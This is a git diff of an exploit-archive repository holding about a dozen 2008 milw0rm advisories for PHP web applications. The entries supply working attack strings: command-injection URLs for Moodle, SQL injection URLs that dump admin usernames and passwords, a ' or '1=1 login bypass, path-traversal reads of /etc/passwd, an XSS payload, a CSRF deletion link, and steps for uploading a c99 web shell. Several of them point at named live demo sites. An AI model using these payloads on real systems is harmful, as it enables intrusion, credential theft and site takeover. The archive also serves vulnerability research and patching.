+Vendor            http://moodle.org/
+Advisory          http://www.ush.it/team/ush/hack-moodle193/moodle193.txt
+Authors           Antonio "s4tan" Parata (s4tan AT ush DOT it)
+                  Francesco "ascii" Ongaro (ascii AT ush DOT it)
+                  Giovanni "evilaliv3" Pellerano (evilaliv3 AT
+                  digitalbullets DOT org)
+Date              20081212
+
+I. BACKGROUND
+
+>From the Moodle web site: "Moodle is a course management system (CMS) -
+a free, Open Source software package designed using sound pedagogical
+principles, to help educators create effective online learning
+communities".
+
+II. DESCRIPTION
+
+A Remote Code Execution exists in Moodle 1.9.3.
+
+III. ANALYSIS
+
+- Remote Code Execution (RCE) in texed.php (pathname parameter)
+
+A Remote Code Execution (RCE) vulnerability has been found in
+filter/tex/texed.php. In order to exploit this vulnerability
+register_globals must be enabled as the "TeX Notation" filter.
+
+All these conditions reduce the impact of the vulnerability, to remark
+this fact we have set "multiple authentication" flag in the cvss2 score).
+
+In texed.php we find the following instructions:
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+$cmd = tex_filter_get_cmd($pathname, $texexp);
+system($cmd, $status);
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+Where the function "tex_filter_get_cmd", defined in lib.php, is the
+following:
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+function tex_filter_get_cmd($pathname, $texexp) {
+    $texexp = escapeshellarg($texexp);
+    $executable = tex_filter_get_executable(false);
+
+    if ((PHP_OS == "WINNT") || (PHP_OS == "WIN32") || (PHP_OS ==
+"Windows")) {
+        $executable = str_replace(' ', '^ ', $executable);
+        return "$executable ++ -e  \"$pathname\" -- $texexp";
+
+    } else {
+        return "\"$executable\" -e \"$pathname\" -- $texexp";
+    }
+}
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+As we can see no check is performed on the "$pathname" parameter neither
+in "texed.php" neither in the "tex_filter_get_cmd" function declared in
+"lib.php".
+
+Seen this it's possible to exploit this vulnerability to execute
+arbitrary commands on the target server. The following urls are proof
+of concept for Linux and Windows:
+
+On Linux:
+http://www.example.com/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;echo+"
+
+On Windows:
+http://www.example.com/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+dir+||+echo+
+
+This RCE is "blind". You'll never see the list dir of the example
+because there is no print of the system command output.
+
+IV. DETECTION
+
+Moodle 1.9.3 and possibly earlier versions are vulnerable.
+
+V. WORKAROUND
+
+Proper input validation will fix the vulnerabilities. Actually the
+vulnerability is fixed in the Dev tree.
+
+Upgrade to latest development version.
+
+VI. VENDOR RESPONSE
+
+Vendor will not release a new version addressing this vulnerability
+since moodle has several different issues with register globals and
+the vendor decided to resolve them in a different way for the upcoming
+versions.
+
+"At present we are working on changes that will prevent installation when
+register globals on. They should be committed later this week. I suppose
+we are not going to release 1.9.4 now because register globals issue is
+a know problem already."
+
+VII. CVE INFORMATION
+
+No CVE at this time.
+
+VIII. DISCLOSURE TIMELINE
+
+20080121 Bug discovered
+20081111 Initial vendor contact (No Response)
+20081811 Second vendor contact (No Response)
+20081811 Vendor response
+20081212 Advisory released (Fix available only in dev tree)
+
+IX. CREDIT
+
+Antonio "s4tan" Parata, Francesco "ascii" Ongaro and Giovanni
+"evilaliv3" Pellerano are credited with the discovery of this
+vulnerability.
+
+Antonio "s4tan" Parata
+web site: http://www.ictsc.it/
+mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it
+
+Francesco "ascii" Ongaro
+web site: http://www.ush.it/
+mail: ascii AT ush DOT it
+
+Giovanni "evilaliv3" Pellerano
+mail: evilaliv3 AT digitalbullets DOT it
+
+X. LEGAL NOTICES
+
+Copyright (c) 2008 Francesco "ascii" Ongaro
+
+Permission is granted for the redistribution of this alert
+electronically. It may not be edited in any way without mine express
+written consent. If you wish to reprint the whole or any
+part of this alert in any other medium other than electronically,
+please email me for permission.
+
+Disclaimer: The information in the advisory is believed to be accurate
+at the time of publishing based on currently available information. Use
+of the information constitutes acceptance for use in an AS IS condition.
+There are no warranties with regard to this information. Neither the
+author nor the publisher accepts any liability for any direct, indirect,
+or consequential loss or damage arising from use of, or reliance on,
+this information.
+
+# milw0rm.com [2008-12-12]
diff --git a/platforms/php/webapps/7439.txt b/platforms/php/webapps/7439.txt
index a67d2156d..889f005c3 100755
--- a/platforms/php/webapps/7439.txt
+++ b/platforms/php/webapps/7439.txt
@@ -1,59 +1,59 @@
- 
-                          ||          ||   | ||         
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,  
-                  ( :   /    (_)    /           (   .   
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
- 
- 
-<<!>> Found by  :  Fisher
- 
-<<!>> C0ntact : sq7@w.cn
-                    
-<<!>> Groups : InjEctOr5 T3am  
- 
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
- 
- 
-<<->> script   : Songs Portal
- 
-<<->> download : www.umerinc.com/songs_portal.php
- 
- 
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
- 
- 
-<<->> D0rk    :  ;)
- 
-<<->> Exploit :>>>
- 
-    :>>  http://www.site.com/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin--
- 
- 
- 
- Demo :
- 
- http://www.umerinc.com/portfolio/aamir/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin--
- 
- 
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
- 
-<<->> HCJ,Sniper_Net,broken security ,Cyb3r-1sT & all friends
-
-# milw0rm.com [2008-12-12]
+ 
+                          ||          ||   | ||         
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,  
+                  ( :   /    (_)    /           (   .   
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+ 
+ 
+<<!>> Found by  :  Fisher
+ 
+<<!>> C0ntact : sq7@w.cn
+                    
+<<!>> Groups : InjEctOr5 T3am  
+ 
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+ 
+ 
+<<->> script   : Songs Portal
+ 
+<<->> download : www.umerinc.com/songs_portal.php
+ 
+ 
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+ 
+ 
+<<->> D0rk    :  ;)
+ 
+<<->> Exploit :>>>
+ 
+    :>>  http://www.site.com/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin--
+ 
+ 
+ 
+ Demo :
+ 
+ http://www.umerinc.com/portfolio/aamir/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin--
+ 
+ 
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+ 
+<<->> HCJ,Sniper_Net,broken security ,Cyb3r-1sT & all friends
+
+# milw0rm.com [2008-12-12]
diff --git a/platforms/php/webapps/7441.txt b/platforms/php/webapps/7441.txt
index 40d64aca4..20e66cdb8 100755
--- a/platforms/php/webapps/7441.txt
+++ b/platforms/php/webapps/7441.txt
@@ -1,28 +1,28 @@
-Joomla Live Chat
-
-http://www.joompolitan.com/livechat.html
-
-Google Dork: allinurl:option=com_livechat
-
-author: jdc
-
-
-SQL Injections:
-
-administrator/components/com_livechat/getChat.php && administrator/components/com_livechat/getSavedChatRooms.php don't sanitize the variable 'last':
-
-
-$last = (isset($_GET['last']) && $_GET['last'] != '') ? $_GET['last'] : 0;
---------------------------------------------------------^
-
-administrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users
-
-administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users
-
-
-Open Proxy ( sends HTTP_FORWARDED ):
-
-administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com
-
-
-# milw0rm.com [2008-12-12]
+Joomla Live Chat
+
+http://www.joompolitan.com/livechat.html
+
+Google Dork: allinurl:option=com_livechat
+
+author: jdc
+
+
+SQL Injections:
+
+administrator/components/com_livechat/getChat.php && administrator/components/com_livechat/getSavedChatRooms.php don't sanitize the variable 'last':
+
+
+$last = (isset($_GET['last']) && $_GET['last'] != '') ? $_GET['last'] : 0;
+--------------------------------------------------------^
+
+administrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users
+
+administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users
+
+
+Open Proxy ( sends HTTP_FORWARDED ):
+
+administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com
+
+
+# milw0rm.com [2008-12-12]
diff --git a/platforms/php/webapps/7443.txt b/platforms/php/webapps/7443.txt
index 430a4e2cd..f60717246 100755
--- a/platforms/php/webapps/7443.txt
+++ b/platforms/php/webapps/7443.txt
@@ -1,41 +1,41 @@
-[START]
-
-#########################################################################################
-[0x01] Informations:
-
-Script         : FlexPHPNews PRO 0.0.6
-Script	       : FlexPHPNews 0.0.6
-Download       : http://www.hotscripts.com/jump.php?listing_id=24219&jump_type=1  [0.0.6 Pro]
-Download       : http://www.hotscripts.com/jump.php?listing_id=22130&jump_type=1  [0.0.6]
-Vulnerability  : Sql Injection (Auth bypass)
-Author         : Osirys
-Contact        : osirys[at]live[dot]it
-Notes          : Proud to be Italian
-Greets:        : XaDoS, x0r, emgent, Jay, str0ke
-
-#########################################################################################
-[0x02] Bug:[Sql Injection (Auth bypass)]
-######
-
-Bugged file is: /[path]/admin/usercheck.php
-
-[CODE]
-
-if (!empty($logincheck)){
-$sql = "select username,adminid from newsadmin where username='$checkuser' and password='$checkpass'";
-$results = $db->select($sql);
-
-[/CODE]
-
-
-[!] EXPLOIT DETAILS:
-
- [1] Go to /[path]/admin/index.php
- [2] Put as username and password the following sql code: ' or '1=1
- [3] You are the admin now, bypass succesfull =)
-
-#########################################################################################
-
-[/END]
-
-# milw0rm.com [2008-12-14]
+[START]
+
+#########################################################################################
+[0x01] Informations:
+
+Script         : FlexPHPNews PRO 0.0.6
+Script	       : FlexPHPNews 0.0.6
+Download       : http://www.hotscripts.com/jump.php?listing_id=24219&jump_type=1  [0.0.6 Pro]
+Download       : http://www.hotscripts.com/jump.php?listing_id=22130&jump_type=1  [0.0.6]
+Vulnerability  : Sql Injection (Auth bypass)
+Author         : Osirys
+Contact        : osirys[at]live[dot]it
+Notes          : Proud to be Italian
+Greets:        : XaDoS, x0r, emgent, Jay, str0ke
+
+#########################################################################################
+[0x02] Bug:[Sql Injection (Auth bypass)]
+######
+
+Bugged file is: /[path]/admin/usercheck.php
+
+[CODE]
+
+if (!empty($logincheck)){
+$sql = "select username,adminid from newsadmin where username='$checkuser' and password='$checkpass'";
+$results = $db->select($sql);
+
+[/CODE]
+
+
+[!] EXPLOIT DETAILS:
+
+ [1] Go to /[path]/admin/index.php
+ [2] Put as username and password the following sql code: ' or '1=1
+ [3] You are the admin now, bypass succesfull =)
+
+#########################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7448.txt b/platforms/php/webapps/7448.txt
index 465d8ec18..8ca617fae 100755
--- a/platforms/php/webapps/7448.txt
+++ b/platforms/php/webapps/7448.txt
@@ -1,60 +1,60 @@
-############################################################################################
-[+] AutositePHP v2.0.3 (LFI/CSRF/Edit File) Multiple Remote Vulnerabilities
-[+] Discovered By SirGod
-[+] Greetz : All my friends
-[+] Download Script : http://sourceforge.net/projects/autositephp/
-############################################################################################
-
-[+] Local File Inclusion
-
-    PoC 1 :
-
-      http://[target]/[path]/index.php?page=users/[Local File]
-
-    Example 1 :
-
-      http://127.0.0.1/path/index.php?page=users/../../../../boot.ini
-
-
-    PoC 2 :
-
-      http://[target]/[path]/index.php?page=users/login.php&update=update/[Local
-File]
-
-    Example 1 :
-
-      http://127.0.0.1/path/index.php?page=users/login.php&update=update/../../../../boot.ini
-
-
-[+] Edit File
-
- - Need administrative permissions.You can edit files from the webserver.
-
-    PoC :
-
-      http://[target]/[path]/pages/Admin/File%20Editor/actions/modify.php?page=pages/[Local
-File]
-
-    Example :
-
-      http://127.0.0.1/path/pages/Admin/File%20Editor/actions/modify.php?page=pages/../../../../boot.ini
-
-
-[+] Cross Site Request Forgery
-
-
-  If a logged in user with administrator privileges clicks on the
-following url :
-
-     http://127.0.0.1/path/index.php?page=pages/Admin/Users/viewusers/delete.php&username=SirGod&submit=submit
-
-  The username SirGod will be deleted.You can change the username to another.
-
-     http://127.0.0.1/path/index.php?page=pages/Admin/Users/viewusers/delete.php&username=[USERNAME]&submit=submit
-
-[USERNAME] = name of account that you want to delete.
-
-
-############################################################################################
-
-# milw0rm.com [2008-12-14]
+############################################################################################
+[+] AutositePHP v2.0.3 (LFI/CSRF/Edit File) Multiple Remote Vulnerabilities
+[+] Discovered By SirGod
+[+] Greetz : All my friends
+[+] Download Script : http://sourceforge.net/projects/autositephp/
+############################################################################################
+
+[+] Local File Inclusion
+
+    PoC 1 :
+
+      http://[target]/[path]/index.php?page=users/[Local File]
+
+    Example 1 :
+
+      http://127.0.0.1/path/index.php?page=users/../../../../boot.ini
+
+
+    PoC 2 :
+
+      http://[target]/[path]/index.php?page=users/login.php&update=update/[Local
+File]
+
+    Example 1 :
+
+      http://127.0.0.1/path/index.php?page=users/login.php&update=update/../../../../boot.ini
+
+
+[+] Edit File
+
+ - Need administrative permissions.You can edit files from the webserver.
+
+    PoC :
+
+      http://[target]/[path]/pages/Admin/File%20Editor/actions/modify.php?page=pages/[Local
+File]
+
+    Example :
+
+      http://127.0.0.1/path/pages/Admin/File%20Editor/actions/modify.php?page=pages/../../../../boot.ini
+
+
+[+] Cross Site Request Forgery
+
+
+  If a logged in user with administrator privileges clicks on the
+following url :
+
+     http://127.0.0.1/path/index.php?page=pages/Admin/Users/viewusers/delete.php&username=SirGod&submit=submit
+
+  The username SirGod will be deleted.You can change the username to another.
+
+     http://127.0.0.1/path/index.php?page=pages/Admin/Users/viewusers/delete.php&username=[USERNAME]&submit=submit
+
+[USERNAME] = name of account that you want to delete.
+
+
+############################################################################################
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7449.txt b/platforms/php/webapps/7449.txt
index 5c9122337..237f32bc4 100755
--- a/platforms/php/webapps/7449.txt
+++ b/platforms/php/webapps/7449.txt
@@ -1,21 +1,21 @@
-####################################################################################################
-# iyzi Forum (db/iyziforum.mdb) Database Disclosure Vulnerability                                  #
-# © Ghost Hacker - REAL-H.COM                                                                      #
-####################################################################################################
-#[~] Author : Ghost Hacker                                                                         #
-#[~] Homepage : http://Real-h.com                                                                  #
-#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com                                                    #
-#[~] Name Script : iyzi Forum                                                                      #
-#[~] Download : http://www.iyziforum.com/                                                          #
-####################################################################################################
-#[~]Exploit                                                                                        #
-# http://xxxx.com/[path]/db/iyziforum.mdb                                                          #
-#[~]Live Demo     &nb sp;                                                                          #
-# http://www.iyziforum.com/demos/kJd32D33J11lOk6f7n2/db/iyziforum.mdb                              #
-####################################################################################################
-#[~]Greets :                                                                                       #
-# Mr.SaFa7 [v4-team.com] , AlpHaNiX , Qabandi                                                      #
-# All Members Real-h.com and v4-team.net , All My Friends                                          #
-####################################################################################################
-
-# milw0rm.com [2008-12-14]
+####################################################################################################
+# iyzi Forum (db/iyziforum.mdb) Database Disclosure Vulnerability                                  #
+# © Ghost Hacker - REAL-H.COM                                                                      #
+####################################################################################################
+#[~] Author : Ghost Hacker                                                                         #
+#[~] Homepage : http://Real-h.com                                                                  #
+#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com                                                    #
+#[~] Name Script : iyzi Forum                                                                      #
+#[~] Download : http://www.iyziforum.com/                                                          #
+####################################################################################################
+#[~]Exploit                                                                                        #
+# http://xxxx.com/[path]/db/iyziforum.mdb                                                          #
+#[~]Live Demo     &nb sp;                                                                          #
+# http://www.iyziforum.com/demos/kJd32D33J11lOk6f7n2/db/iyziforum.mdb                              #
+####################################################################################################
+#[~]Greets :                                                                                       #
+# Mr.SaFa7 [v4-team.com] , AlpHaNiX , Qabandi                                                      #
+# All Members Real-h.com and v4-team.net , All My Friends                                          #
+####################################################################################################
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7451.txt b/platforms/php/webapps/7451.txt
index 57a7d4bf8..0d5864aa4 100755
--- a/platforms/php/webapps/7451.txt
+++ b/platforms/php/webapps/7451.txt
@@ -1,29 +1,29 @@
-****(Lfi/xss)****
-
-script: phpweather-2.2.2
-
-***************************************************************************
-download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&big_mirror=0
-   
-***************************************************************************
-vul:
-/test.php
-
-line 48:
- require(PHPWEATHER_BASE_DIR . "/output/pw_text_$language.php");
-   
-***************************************************
-xpl:
-www.site.com/path/test.php?metar=()&language=[Lfi]%00
-.....................................................
-www.site.com/path/index.php?cc=[Lfi]
-....................................................
-xss:
-www.site.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt>
-..................................................
-
-Author: ahmadbady from:iran
-
-***************************************************
-
-# milw0rm.com [2008-12-14]
+****(Lfi/xss)****
+
+script: phpweather-2.2.2
+
+***************************************************************************
+download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&big_mirror=0
+   
+***************************************************************************
+vul:
+/test.php
+
+line 48:
+ require(PHPWEATHER_BASE_DIR . "/output/pw_text_$language.php");
+   
+***************************************************
+xpl:
+www.site.com/path/test.php?metar=()&language=[Lfi]%00
+.....................................................
+www.site.com/path/index.php?cc=[Lfi]
+....................................................
+xss:
+www.site.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt>
+..................................................
+
+Author: ahmadbady from:iran
+
+***************************************************
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7453.txt b/platforms/php/webapps/7453.txt
index cd81d4c25..4e6687544 100755
--- a/platforms/php/webapps/7453.txt
+++ b/platforms/php/webapps/7453.txt
@@ -1,31 +1,31 @@
-#Free Links Directory Script (id) SQL Injection Vulnerability
-
-
-#Author: nuclear
-
-
-#site:
-http://flds-script.com
-
-
-#vuln:
-http://localhost/[path]/redir.php?id=-1%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11/*
-
-
-#vulnerable code:
-$ida = $_GET['id'];
-$link = mysql_fetch_array(mysql_query("select * from links where id=$ida"));
-$idcheck = mysql_numrows(mysql_query("select * from links where id=$ida"));
-
-
-#demo:
-http://flds-script.com/demo/redir.php?id=-1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11
-
-#notes:
-the injection does not work if trying to comment out the rest of the query.The result page will be a 404 but
-you can get the data of the injection in the url
-
-
-#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar
-
-# milw0rm.com [2008-12-14]
+#Free Links Directory Script (id) SQL Injection Vulnerability
+
+
+#Author: nuclear
+
+
+#site:
+http://flds-script.com
+
+
+#vuln:
+http://localhost/[path]/redir.php?id=-1%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11/*
+
+
+#vulnerable code:
+$ida = $_GET['id'];
+$link = mysql_fetch_array(mysql_query("select * from links where id=$ida"));
+$idcheck = mysql_numrows(mysql_query("select * from links where id=$ida"));
+
+
+#demo:
+http://flds-script.com/demo/redir.php?id=-1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11
+
+#notes:
+the injection does not work if trying to comment out the rest of the query.The result page will be a 404 but
+you can get the data of the injection in the url
+
+
+#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7455.txt b/platforms/php/webapps/7455.txt
index 4fadbe2c6..3925edb48 100755
--- a/platforms/php/webapps/7455.txt
+++ b/platforms/php/webapps/7455.txt
@@ -1,17 +1,17 @@
-----------------------------
-The Rat Cms Alpha 2 > Priviledge Escalation
-----------------------------
-Autore: x0r
-Email: andry2000@hotmail.it
-Download:
-http://downloads.sourceforge.net/the-rat-cms/trcms_pre_alpha_2.zip?modtime=1174590953&big_mirror=0
-----------------------------
-Bug In: /admin/*.php
-
-So Funny ^^ 
-
-Exploit:
-
-http://[victim]/admin/download.php [ just a example ^^ ]
-
-# milw0rm.com [2008-12-14]
+----------------------------
+The Rat Cms Alpha 2 > Priviledge Escalation
+----------------------------
+Autore: x0r
+Email: andry2000@hotmail.it
+Download:
+http://downloads.sourceforge.net/the-rat-cms/trcms_pre_alpha_2.zip?modtime=1174590953&big_mirror=0
+----------------------------
+Bug In: /admin/*.php
+
+So Funny ^^ 
+
+Exploit:
+
+http://[victim]/admin/download.php [ just a example ^^ ]
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7456.txt b/platforms/php/webapps/7456.txt
index 9fa365b6f..c7eefb97e 100755
--- a/platforms/php/webapps/7456.txt
+++ b/platforms/php/webapps/7456.txt
@@ -1,37 +1,37 @@
-[~] Availscript Article Script Remote File Upload Vulnerability
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: S.W.A.T.   svvateam@yahoo.com
-[~]
-[~] Home: www.batlagh.com
-[~]
-[~] Script Page: http://www.availscript.com/article_script.php
-[~] -----------------------------------------------------------
-
-Xpl:
-
-1.First Register Into The Site ( link: www.site.com/[path]/signup.php )
-
-2.Login With Your Email & Password
-
-3.After That Go To "Add Pen/Author Name" ( link: www.site.com/[path]/memberarea/addpen.php )
-& Write Your Author & Select Your Shell.php like: c99.php
-
-4.Your Shell Will Be Appear In This Folder ( link: www.site.com/[path]/photos/ )
-
-5.Your Shell Will Be Renamed With Random Text like: cc1bd-c99.php
-
-6.Hack The Site ;)
-
-
-Demo:
-
-http://www.availscript.com/article_script/
-
-
-
-[~] Special Thanks To:
-
-Str0ke, All My Friends, Iranian Hackers & All Muslim
-
-# milw0rm.com [2008-12-14]
+[~] Availscript Article Script Remote File Upload Vulnerability
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: S.W.A.T.   svvateam@yahoo.com
+[~]
+[~] Home: www.batlagh.com
+[~]
+[~] Script Page: http://www.availscript.com/article_script.php
+[~] -----------------------------------------------------------
+
+Xpl:
+
+1.First Register Into The Site ( link: www.site.com/[path]/signup.php )
+
+2.Login With Your Email & Password
+
+3.After That Go To "Add Pen/Author Name" ( link: www.site.com/[path]/memberarea/addpen.php )
+& Write Your Author & Select Your Shell.php like: c99.php
+
+4.Your Shell Will Be Appear In This Folder ( link: www.site.com/[path]/photos/ )
+
+5.Your Shell Will Be Renamed With Random Text like: cc1bd-c99.php
+
+6.Hack The Site ;)
+
+
+Demo:
+
+http://www.availscript.com/article_script/
+
+
+
+[~] Special Thanks To:
+
+Str0ke, All My Friends, Iranian Hackers & All Muslim
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7457.txt b/platforms/php/webapps/7457.txt
index 369139600..d5acd4f8d 100755
--- a/platforms/php/webapps/7457.txt
+++ b/platforms/php/webapps/7457.txt
@@ -1,36 +1,36 @@
-[~] Availscript Classmate Script Remote File Upload Vulnerability
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: S.W.A.T.   svvateam@yahoo.com
-[~]
-[~] Home: www.batlagh.com
-[~]
-[~] Script Page: http://www.availscript.com/classmate_script.php
-[~] -----------------------------------------------------------
-
-Xpl:
-
-1.First Register Into The Site ( link: www.site.com/[path]/register.php )
-
-2.In Register Section Select Your phpshell like: c99.php
-
-3.In "Latest Members" Section Right Click On Blank Line & Then Choose Properties
-
-4.Copy The Link Of Your Shell Like: http://www.availscript.com/classmate/memberspics/saeid-61609-c99.php
-
-5.Your Shell Will Be Renamed With Your Name & Random ID like: saeid-61609-c99.php
-
-6.Hack The Site ;)
-
-
-Demo:
-
-http://www.availscript.com/classmate/
-
-
-
-[~] Special Thanks To:
-
-Str0ke, All My Friends, Iranian Hackers & All Muslim
-
-# milw0rm.com [2008-12-14]
+[~] Availscript Classmate Script Remote File Upload Vulnerability
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: S.W.A.T.   svvateam@yahoo.com
+[~]
+[~] Home: www.batlagh.com
+[~]
+[~] Script Page: http://www.availscript.com/classmate_script.php
+[~] -----------------------------------------------------------
+
+Xpl:
+
+1.First Register Into The Site ( link: www.site.com/[path]/register.php )
+
+2.In Register Section Select Your phpshell like: c99.php
+
+3.In "Latest Members" Section Right Click On Blank Line & Then Choose Properties
+
+4.Copy The Link Of Your Shell Like: http://www.availscript.com/classmate/memberspics/saeid-61609-c99.php
+
+5.Your Shell Will Be Renamed With Your Name & Random ID like: saeid-61609-c99.php
+
+6.Hack The Site ;)
+
+
+Demo:
+
+http://www.availscript.com/classmate/
+
+
+
+[~] Special Thanks To:
+
+Str0ke, All My Friends, Iranian Hackers & All Muslim
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7458.txt b/platforms/php/webapps/7458.txt
index 12fcaba9d..2a393e752 100755
--- a/platforms/php/webapps/7458.txt
+++ b/platforms/php/webapps/7458.txt
@@ -1,37 +1,37 @@
-[START]
-
-#########################################################################################
-[0x01] Informations:
-
-Script         : Mediatheka 4.2
-Download       : http://www.hotscripts.com/jump.php?listing_id=79106&jump_type=1
-Vulnerability  : Local File Inclusion
-Author         : Osirys
-Contact        : osirys[at]live[dot]it
-Notes          : Proud to be Italian
-Greets:        : XaDoS, x0r, emgent, Jay, str0ke
-
-#########################################################################################
-[0x02] Bug:[Local File Inclusion]
-######
-
-Bugged file is: /[path]/index.php
-
-[CODE]
-
-	if(isset($_GET['lang']))
-		$lang = $_GET['lang'];
-	else
-		$lang = 'en';
-	include("langs/$lang.php");
-
-[/CODE]
-
-
-[!] EXPLOIT: /[path]/index.php?lang=[local_file_to_include]
-                                    ../../../../../../../../../../../etc/passwd%00
-#########################################################################################
-
-[/END]
-
-# milw0rm.com [2008-12-14]
+[START]
+
+#########################################################################################
+[0x01] Informations:
+
+Script         : Mediatheka 4.2
+Download       : http://www.hotscripts.com/jump.php?listing_id=79106&jump_type=1
+Vulnerability  : Local File Inclusion
+Author         : Osirys
+Contact        : osirys[at]live[dot]it
+Notes          : Proud to be Italian
+Greets:        : XaDoS, x0r, emgent, Jay, str0ke
+
+#########################################################################################
+[0x02] Bug:[Local File Inclusion]
+######
+
+Bugged file is: /[path]/index.php
+
+[CODE]
+
+	if(isset($_GET['lang']))
+		$lang = $_GET['lang'];
+	else
+		$lang = 'en';
+	include("langs/$lang.php");
+
+[/CODE]
+
+
+[!] EXPLOIT: /[path]/index.php?lang=[local_file_to_include]
+                                    ../../../../../../../../../../../etc/passwd%00
+#########################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7461.txt b/platforms/php/webapps/7461.txt
index 918d5a6e1..93cb6ead3 100755
--- a/platforms/php/webapps/7461.txt
+++ b/platforms/php/webapps/7461.txt
@@ -1,42 +1,42 @@
-<!--
-exploit flatnux grabber cookies visitor
-site :http://www.speleoalex.altervista.org/flatnuke3/index.php
-download:http://www.speleoalex.altervista.org/flatnuke3/index.php?mod=06_Download
-author:gmda
-
-Flatnux does not filter code html/javascript then you can injector in this way:
-
